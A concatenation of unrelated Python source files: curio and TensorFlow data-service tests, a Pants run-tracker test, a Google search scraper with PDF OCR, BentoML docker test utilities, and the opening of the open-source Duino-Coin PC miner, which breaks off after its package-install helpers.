with pytest.raises(RuntimeError):
await c.wait()
kernel.run(main)
class TestUniversalEvent:
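# UniversalEvent must interoperate across curio tasks, plain threads and
# asyncio coroutines; each test pairs a setter and a waiter from two of these worlds.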
def test_uevent_get_wait(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('event_set')
await evt.set()
async def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
await evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = UniversalEvent()
t1 = await spawn(event_waiter, evt)
t2 = await spawn(event_setter, evt, 1)
await t1.join()
await t2.join()
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_uevent_get_twait(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('event_set')
await evt.set()
def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = UniversalEvent()
t1 = threading.Thread(target=event_waiter, args=(evt,))
t1.start()
t2 = await spawn(event_setter, evt, 1)
await run_in_thread(t1.join)
await t2.join()
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_uevent_get_asyncio_set(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await asyncio.sleep(seconds)
results.append('event_set')
await evt.set()
async def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
await evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = UniversalEvent()
t1 = await spawn(event_waiter, evt)
await sleep(0.05)
t2 = threading.Thread(target=asyncio.run, args=[event_setter(evt, 1)])
t2.start()
await t1.join()
await run_in_thread(t2.join)
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_uevent_get_asyncio_wait(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('event_set')
await evt.set()
async def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
await evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = UniversalEvent()
t1 = threading.Thread(target=asyncio.run, args=[event_waiter(evt)])
t1.start()
await sleep(0.1)
t2 = await spawn(event_setter, evt, 1)
await run_in_thread(t1.join)
await t2.join()
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_repr():
# For test coverage
for cls in [Lock, Event, Semaphore, Condition, RLock, UniversalEvent ]:
repr(cls())
|
test_run_tracker.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import http.server
import json
import threading
from urllib.parse import parse_qs
from pants.auth.cookies import Cookies
from pants.goal.run_tracker import RunTracker
from pants.testutil.test_base import TestBase
from pants.util.contextutil import temporary_file_path
from pants.version import VERSION
class RunTrackerTest(TestBase):
def assert_upload_stats(self, *, response_code) -> None:
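# Spins up a throwaway local HTTP server and checks that RunTracker.post_stats
# uploads correctly in both the v1 (form-encoded) and v2 (JSON) formats,
# following a 307 redirect but failing on a 302.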
stats = {'stats': {'foo': 'bar', 'baz': 42}}
class Handler(http.server.BaseHTTPRequestHandler):
def do_POST(handler):
try:
if handler.path.startswith('/redirect'):
code = int(handler.path[-3:])
handler.send_response(code)
handler.send_header('location', mk_url('/upload'))
handler.end_headers()
else:
self.assertEqual('/upload', handler.path)
stats_version = handler.headers['X-Pants-Stats-Version']
self.assertIn(stats_version, {"1", "2"})
self.assertEqual(handler.headers['User-Agent'], f"pants/v{VERSION}")
length = int(handler.headers['Content-Length'])
content = handler.rfile.read(length).decode()
if stats_version == "2":
self.assertEqual('application/json', handler.headers['Content-type'])
decoded_post_data = json.loads(content)
self.assertEqual(len(decoded_post_data), 1)
builds = decoded_post_data['builds']
self.assertEqual(len(builds), 1)
received_stats = builds[0]
else:
self.assertEqual('application/x-www-form-urlencoded', handler.headers['Content-type'])
received_stats = {k: json.loads(v[0]) for k, v in parse_qs(content).items()}
self.assertEqual(stats, received_stats)
handler.send_response(response_code)
handler.end_headers()
except Exception:
handler.send_response(400) # Ensure the main thread knows the test failed.
raise
server_address = ('', 0)
server = http.server.HTTPServer(server_address, Handler)
host, port = server.server_address
def mk_url(path):
return f'http://{host}:{port}{path}'
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
self.context(for_subsystems=[Cookies])
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats, stats_version=1))
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats, stats_version=2))
self.assertTrue(RunTracker.post_stats(mk_url('/redirect307'), stats, stats_version=1))
self.assertFalse(RunTracker.post_stats(mk_url('/redirect302'), stats, stats_version=2))
server.shutdown()
server.server_close()
def test_upload_stats(self):
self.assert_upload_stats(response_code=200)
self.assert_upload_stats(response_code=201)
self.assert_upload_stats(response_code=204)
def test_invalid_stats_version(self):
stats = {'stats': {'foo': 'bar', 'baz': 42}}
url = 'http://example.com/upload/'
with self.assertRaises(ValueError):
RunTracker.post_stats(url, stats, stats_version=0)
with self.assertRaises(ValueError):
RunTracker.post_stats(url, stats, stats_version=None)
with self.assertRaises(ValueError):
RunTracker.post_stats(url, stats, stats_version=9)
with self.assertRaises(ValueError):
RunTracker.post_stats(url, stats, stats_version="not a number")
def test_write_stats_to_json_file(self):
# Set up
stats = {'stats': {'foo': 'bar', 'baz': 42}}
# Execute & verify
with temporary_file_path() as file_name:
RunTracker.write_stats_to_json(file_name, stats)
with open(file_name, 'r') as f:
result = json.load(f)
self.assertEqual(stats, result)
def test_create_dict_with_nested_keys_and_val(self):
keys = []
with self.assertRaises(ValueError):
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something')
keys += ['one']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': 'something'}
)
keys += ['two']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': 'something'}}
)
keys += ['three']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': 'something'}}}
)
keys += ['four']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': {'four': 'something'}}}}
)
def test_merge_list_of_keys_into_dict(self):
data = {}
keys = []
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something')
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', -1)
keys = ['key']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', 1)
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'O-N-E')
self.assertEqual(data, {'a': 'O-N-E'})
keys = ['one', 'two', 'three']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'T-H-R-E-E')
self.assertEqual(data, {'one': {'two': {'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A')
self.assertEqual(data, {'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['c', 'd', 'e', 'f']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'F-O-U-R')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['one', 'two', 'x', 'y']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'W-H-Y')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['c', 'd', 'e', 'g', 'h']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'H-E-L-L-O')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['one', 'two', 'x', 'z']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'Z-E-D')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['c', 'd', 'e', 'g', 'i']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'E-Y-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new O-N-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A-L-A')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A-L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a', 'b', 'c']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new A')
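# --- Illustrative sketch (ours, not part of the Pants test suite) ---
# The private helper exercised above merges a value into a nested dict along a
# list of keys. A simplified standalone equivalent (it ignores the index
# parameter the real helper accepts) that matches the behaviour asserted above:
def _merge_keys_into_dict_sketch(data, keys, value):
    if not keys:
        raise ValueError("keys must be non-empty")
    node = data
    for key in keys[:-1]:
        child = node.get(key)
        if child is None:
            child = node[key] = {}
        elif not isinstance(child, dict):
            raise ValueError(f"cannot descend past non-dict value at key {key!r}")
        node = child
    node[keys[-1]] = value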
|
googlesearch.py
|
"""
Created on May 5, 2017
@author: anthony
"""
import math
import tempfile
import urllib
from collections import deque
from threading import Thread
from time import sleep
from urllib.request import urlopen
from urllib.request import urlretrieve
import numpy as np
import requests
from PIL.PpmImagePlugin import PpmImageFile
from bs4 import BeautifulSoup
# numpy's "long" alias was removed in newer NumPy releases; the builtin int is used below instead
from pdf2image import convert_from_path
from pytesseract import image_to_string
class GoogleSearch:
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ 58.0.3029.81 Safari/537.36"
SEARCH_URL = "https://google.com/search"
RESULT_SELECTOR = "#rso .g .r a:first-child:not(.fl)"
TOTAL_SELECTOR = "#result-stats"
RESULTS_PER_PAGE = 10
DEFAULT_HEADERS = {
'User-Agent': USER_AGENT,
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7",
}
__total = None
@staticmethod
def build_request(url, headers=None):
payload = {}
headers = GoogleSearch.DEFAULT_HEADERS if headers is None else headers
resp = requests.request("GET", url, headers=headers, data=payload)
html = ''
if resp.raw.headers.get('Content-Type') == 'application/pdf':
tf = tempfile.NamedTemporaryFile()
urlretrieve(url, tf.name)
images = np.array(convert_from_path(tf.name), dtype=PpmImageFile.__class__)
extracted_text = np.array([image_to_string(img, lang='por') for img in images])
html = "\n".join(extracted_text)
else:
html = resp.text
resp.close()
return html
def set_total(self, soup):
if self.__total is None:
element_html_total = soup.select(GoogleSearch.TOTAL_SELECTOR)
total_text = element_html_total[0].encode('utf-8')
            self.__total = int(''.join(text for text in str(total_text) if text.isdigit()))
def search(self, query, num_results=10, prefetch_pages=True, prefetch_threads=10):
search_results = []
pages = int(math.ceil(num_results / float(GoogleSearch.RESULTS_PER_PAGE)))
fetcher_threads = deque([])
for i in range(pages):
start = i * GoogleSearch.RESULTS_PER_PAGE
resp = GoogleSearch.build_request(GoogleSearch.SEARCH_URL + "?q=" + urllib.request.quote(query) + ("" if start == 0 else ("&start=" + str(start))))
soup = BeautifulSoup(resp, "lxml")
results = GoogleSearch.parse_results(soup.select(GoogleSearch.RESULT_SELECTOR))
self.set_total(soup)
if len(search_results) + len(results) > num_results:
del results[num_results - len(search_results):]
search_results += results
if prefetch_pages:
for result in results:
while True:
running = 0
for thread in fetcher_threads:
if thread.is_alive():
running += 1
if running < prefetch_threads:
break
sleep(1)
fetcher_thread = Thread(target=result.getText)
fetcher_thread.start()
fetcher_threads.append(fetcher_thread)
for thread in fetcher_threads:
thread.join()
return SearchResponse(search_results, self.__total)
@staticmethod
def parse_results(results):
return [SearchResult(result.text, result.get('href')) for result in results if result.get('href') and result.text]
class SearchResponse:
def __init__(self, results, total):
self.results = results
self.total = total
class SearchResult:
def __init__(self, title, url):
self.title = title
self.url = url
self.__text = None
self.__markup = None
def getText(self):
markup = self.getMarkup()
if self.__text is None and markup:
soup = BeautifulSoup(markup, "lxml")
for junk in soup(["script", "style"]):
junk.extract()
self.__text = soup.get_text()
return self.__text
def getMarkup(self):
if self.__markup is None:
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'}
self.__markup = GoogleSearch.build_request(self.url, headers)
return self.__markup
def __str__(self):
return str(self.__dict__)
    def __unicode__(self):
        # Python 2 leftover; on Python 3 simply defer to __str__
        return self.__str__()
def __repr__(self):
return self.__str__()
if __name__ == "__main__":
# search = GoogleSearch()
# i = 1
# query = " ".join(sys.argv[1:])
# if len(query) == 0:
# query = "python"
# count = 10
# print("Fetching first " + str(count) + " results for \"" + query + "\"...")
# response = search.search(query, count)
# print("TOTAL: " + str(response.total) + " RESULTS")
# for result in response.results:
# print("RESULT #" + str(i) + ": " + result.url + "\n\n")
# i += 1
response = GoogleSearch.build_request(
"https://ww2.stj.jus.br/processo/dj/documento?seq_documento=20012703&data_pesquisa=02/10/2018¶metro=42",
{
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
}
)
print(response)
|
fault_tolerance_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service ops where servers are started late or preempted."""
import threading
import time
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests.service import test_base as data_service_test_base
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
TMP_WORK_DIR = data_service_test_base.TMP_WORK_DIR
NO_WORK_DIR = data_service_test_base.NO_WORK_DIR
class FaultToleranceTest(data_service_test_base.TestBase,
parameterized.TestCase):
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherStop(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
results.append(next(iterator).numpy())
cluster.stop_dispatcher()
# After the dispatcher dies, the worker should continue providing the rest
# of the dataset's elements.
for _ in range(num_elements - 1):
results.append(next(iterator).numpy())
self.assertEqual(results, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBeforeReading(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
cluster.restart_dispatcher()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringReading(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
for elem in iterator:
results.append(elem.numpy())
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringDistributedEpoch(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(
num_elements, cluster, processing_mode="distributed_epoch")
iterator = iter(ds)
results = []
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
for elem in iterator:
results.append(elem.numpy())
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringDistributedEpochRepeat(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
repetitions = 5
breakpoints = [50, 250, 450, 500]
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.repeat(repetitions)
ds = self.make_distributed_dataset(
ds, cluster, processing_mode="distributed_epoch")
iterator = iter(ds)
results = []
for breakpoint_ in breakpoints:
for _ in range(len(results), breakpoint_):
results.append(next(iterator).numpy())
cluster.restart_dispatcher()
self.assertCountEqual(repetitions * list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBetweenIterations(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(100, cluster)
self.assertDatasetProduces(ds, list(range(num_elements)))
cluster.restart_dispatcher()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherManyRestarts(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements_start = 10
num_elements_end = 15
datasets = []
for num_elements in range(num_elements_start, num_elements_end):
datasets.append(
self.make_distributed_range_dataset(num_elements, cluster))
cluster.restart_dispatcher()
for ds, num_elements in zip(datasets,
range(num_elements_start, num_elements_end)):
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherAndWorkerRestart(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
cluster.restart_dispatcher()
cluster.workers[0].restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
cluster.restart_dispatcher()
cluster.workers[0].restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherAndMultiWorkerRestart(self):
num_workers = 2
cluster = data_service_test_base.TestCluster(num_workers=num_workers)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
cluster.restart_dispatcher()
for worker_index in range(num_workers):
cluster.workers[worker_index].restart()
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), results)
cluster.restart_dispatcher()
for worker_index in range(num_workers):
cluster.workers[worker_index].restart()
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testStartServersLate(self):
# Test that the data service client performs retries instead of failing when
# the dataset is created before the master and worker are started.
try:
import portpicker # pylint: disable=g-import-not-at-top
dispatcher_port = portpicker.pick_unused_port()
except:
raise self.skipTest("Flakes in portpicker library do not represent "
"TensorFlow errors.")
cluster = data_service_test_base.TestCluster(
num_workers=1, dispatcher_port=dispatcher_port, start=False)
def start_servers():
time.sleep(0.5)
cluster.start_dispatcher()
cluster.start_workers()
start_servers_thread = threading.Thread(target=start_servers, daemon=True)
start_servers_thread.start()
num_elements = 10
ds = self.make_distributed_range_dataset(num_elements, cluster)
results = [elem.numpy() for elem in ds]
self.assertEqual(list(range(num_elements)), results)
start_servers_thread.join()
@combinations.generate(test_base.eager_only_combinations())
def testAddWorkerMidJob(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
results = []
# Read halfway through the dataset.
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
cluster.add_worker()
# Wait for the new worker to register with the dispatcher.
while cluster.num_registered_workers() < 2:
time.sleep(10 / 1000) # 10ms
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(2 * list(range(num_elements)), results)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(use_same_port=[True, False]),
data_service_test_base.all_cluster_configurations()))
def testRestartWorker(self, use_same_port, work_dir, fault_tolerant_mode):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode)
num_elements = 100
ds = self.make_distributed_range_dataset(num_elements, cluster)
iterator = iter(ds)
# Read halfway through the dataset.
midpoint = num_elements // 2
for i in range(midpoint):
self.assertEqual(i, next(iterator).numpy())
# Stop the original worker and start a new one.
cluster.workers[0].restart(use_same_port=use_same_port)
# There may have been some elements prefetched from the first worker
# before it was stopped.
while True:
val = next(iterator).numpy()
if val == 0:
break
# The dataset starts over now that we read from the new worker.
# TODO(b/157086991): Iterate until end of sequence when we support
# detecting lost workers.
for i in range(1, num_elements // 2):
val = next(iterator).numpy()
self.assertEqual(i, val)
@combinations.generate(test_base.eager_only_combinations())
def testChangeProcessingModeAfterRestart(self):
self.skipTest("b/170910141")
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 100
range_dataset = dataset_ops.Dataset.range(num_elements)
ds = range_dataset.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service=cluster.dispatcher_address(),
job_name="test"))
iterator = iter(ds)
for i in range(num_elements // 2):
self.assertEqual(i, next(iterator).numpy())
cluster.restart_dispatcher()
ds = range_dataset.apply(
data_service_ops.distribute(
processing_mode="distributed_epoch",
service=cluster.dispatcher_address(),
job_name="test"))
with self.assertRaisesOpError("already an existing job with that name "
"using processing mode <parallel_epochs>"):
next(iter(ds)).numpy()
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(work_dir=[TMP_WORK_DIR, NO_WORK_DIR])))
def testDistributeLargeGraphThenRegisterWorker(self, work_dir):
cluster = data_service_test_base.TestCluster(
num_workers=0, work_dir=work_dir, fault_tolerant_mode=False)
# Larger than default OSS grpc message size limit of 4MB.
tensor = array_ops.ones((2, 1000, 1000), dtype=dtypes.float32)
ds = dataset_ops.Dataset.from_tensors(tensor)
ds = self.make_distributed_dataset(ds, cluster)
it = iter(ds)
cluster.add_worker()
self.assertAllEqual(next(it), tensor)
if __name__ == "__main__":
test.main()
|
utils.py
|
# pylint: disable=redefined-outer-name
from contextlib import contextmanager
import logging
import os
import subprocess
import sys
import threading
import time
import urllib
import docker
import bentoml
from bentoml.utils import cached_contextmanager
logger = logging.getLogger("bentoml.tests")
def wait_until_container_ready(container_name, check_message, timeout_seconds=120):
docker_client = docker.from_env()
start_time = time.time()
while True:
time.sleep(1)
# Raise timeout, if exceeds timeout limit
if time.time() - start_time > timeout_seconds:
raise TimeoutError(f'Waiting for container "{container_name}" timed out')
try:
container_list = docker_client.containers.list(
filters={'name': container_name}
)
if not container_list:
continue
except docker.errors.NotFound:
continue
logger.info("Container list: " + str(container_list))
assert (
len(container_list) == 1
        ), f'should be exactly one container with name {container_name}'
container_log = container_list[0].logs().decode()
if check_message in container_log:
logger.info(
f"Found message indicating container readiness in container log: "
f"{container_log}"
)
break
def _wait_until_api_server_ready(host_url, timeout, container=None, check_interval=1):
start_time = time.time()
proxy_handler = urllib.request.ProxyHandler({})
opener = urllib.request.build_opener(proxy_handler)
ex = None
while time.time() - start_time < timeout:
try:
if opener.open(f'http://{host_url}/healthz', timeout=1).status == 200:
return
elif container and container.status != "running":
break
else:
logger.info("Waiting for host %s to be ready..", host_url)
time.sleep(check_interval)
except Exception as e: # pylint:disable=broad-except
logger.info(f"retrying to connect to the host {host_url}...")
ex = e
time.sleep(check_interval)
finally:
if container:
container_logs = container.logs()
if container_logs:
logger.info(f"Container {container.id} logs:")
for log_record in container_logs.decode().split('\r\n'):
logger.info(f">>> {log_record}")
else:
logger.info("Timeout!")
raise AssertionError(
f"Timed out waiting {timeout} seconds for Server {host_url} to be ready, "
f"exception: {ex}"
)
@contextmanager
def export_service_bundle(bento_service):
"""
Export a bentoml service to a temporary directory, yield the path.
Delete the temporary directory on close.
"""
import tempfile
with tempfile.TemporaryDirectory() as path:
bento_service.save_to_dir(path)
yield path
@cached_contextmanager("{saved_bundle_path}, {image_tag}")
def build_api_server_docker_image(saved_bundle_path, image_tag="test_bentoml_server"):
"""
Build the docker image for a saved bentoml bundle, yield the docker image object.
"""
import docker
client = docker.from_env()
logger.info(
f"Building API server docker image from build context: {saved_bundle_path}"
)
try:
image, _ = client.images.build(path=saved_bundle_path, tag=image_tag, rm=False)
yield image
client.images.remove(image.id)
except docker.errors.BuildError as e:
for line in e.build_log:
if 'stream' in line:
print(line['stream'].strip())
raise
@cached_contextmanager("{image.id}")
def run_api_server_docker_container(image, config_file=None, timeout=60):
"""
Launch a bentoml service container from a docker image, yields the host URL.
"""
import docker
client = docker.from_env()
    # Grab a free port number, then release it immediately so docker can bind
    # the container's port 5000 to it below.
    with bentoml.utils.reserve_free_port() as port:
        pass
command_args = "--workers 1"
if config_file is not None:
environment = ["BENTOML_CONFIG=/home/bentoml/bentoml_config.yml"]
volumes = {
os.path.abspath(config_file): {
"bind": "/home/bentoml/bentoml_config.yml",
"mode": "ro",
}
}
else:
environment = None
volumes = None
container = client.containers.run(
image=image.id,
command=command_args,
tty=True,
ports={'5000/tcp': port},
detach=True,
volumes=volumes,
environment=environment,
)
try:
host_url = f"127.0.0.1:{port}"
_wait_until_api_server_ready(host_url, timeout, container)
yield host_url
finally:
print(container.logs())
container.stop()
container.remove()
time.sleep(1) # make sure container stopped & deleted
@contextmanager
def run_api_server(bundle_path, config_file=None, dev_server=False, timeout=20):
"""
Launch a bentoml service directly by the bentoml CLI, yields the host URL.
"""
if dev_server:
serve_cmd = "serve"
else:
serve_cmd = "serve-gunicorn"
my_env = os.environ.copy()
with bentoml.utils.reserve_free_port() as port:
cmd = [sys.executable, "-m", "bentoml", serve_cmd]
if port:
cmd += ['--port', f'{port}']
cmd += [bundle_path]
def print_log(p):
try:
for line in p.stdout:
print(line.decode(), end='')
except ValueError:
pass
if config_file is not None:
my_env["BENTOML_CONFIG"] = os.path.abspath(config_file)
p = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=my_env,
)
try:
threading.Thread(target=print_log, args=(p,), daemon=True).start()
host_url = f"127.0.0.1:{port}"
_wait_until_api_server_ready(host_url, timeout=timeout)
yield host_url
finally:
# TODO: can not terminate the subprocess on Windows
p.terminate()
p.wait()
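# --- Hedged usage sketch (ours, not part of the original test utilities) ---
# The helpers above are designed to compose: export a BentoService bundle,
# build a docker image from it, run a container, then hit its HTTP API.
# "my_bento_service" is a hypothetical BentoService instance supplied by the caller.
def _example_docker_round_trip(my_bento_service):
    import urllib.request
    with export_service_bundle(my_bento_service) as bundle_path:
        with build_api_server_docker_image(bundle_path, image_tag="test_bentoml_server") as image:
            with run_api_server_docker_container(image, timeout=60) as host_url:
                # readiness has already been verified against /healthz by the helper
                return urllib.request.urlopen(f"http://{host_url}/healthz", timeout=5).status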
|
pc_miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5.6)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from platform import machine as osprocessor
from os import path, system
from os import system as ossystem
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
from random import choice
import pip
import select
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
